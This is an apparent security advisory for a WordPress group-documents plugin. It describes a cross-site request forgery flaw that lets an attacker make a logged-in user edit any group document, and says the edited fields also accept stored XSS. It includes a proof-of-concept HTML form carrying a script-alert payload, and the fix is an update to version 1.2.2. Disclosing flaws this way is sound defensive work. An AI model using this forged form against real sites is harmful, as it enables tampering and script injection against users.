CVSS Summary
Score | 5 Medium |
---|---|
Vector | Network |
Complexity | Low |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | None |
Last revised:
An unauthenticated user can cause a logged in user to edit the name and description of any existing group document. The fields are also vulnerable to XSS.
Current state: Fixed
Score | 5 Medium |
---|---|
Vector | Network |
Complexity | Low |
Authentication | None |
Confidentiality | None |
Integrity | Partial |
Availability | None |
Assume we have a group with slug “x” and a group document with id 8:
<form method="POST" action="https://wp.ayumu/groups/x/documents/"> <input type="text" name="bp_group_documents_operation" value="edit"> <input type="text" name="bp_group_documents_id" value="8"> <input type="text" name="bp_group_documents_name" value="<script>alert(1)</script>"> <input type="text" name="bp_group_documents_description" value="abc"> <input type="submit"> </form>
Update to version 1.2.2.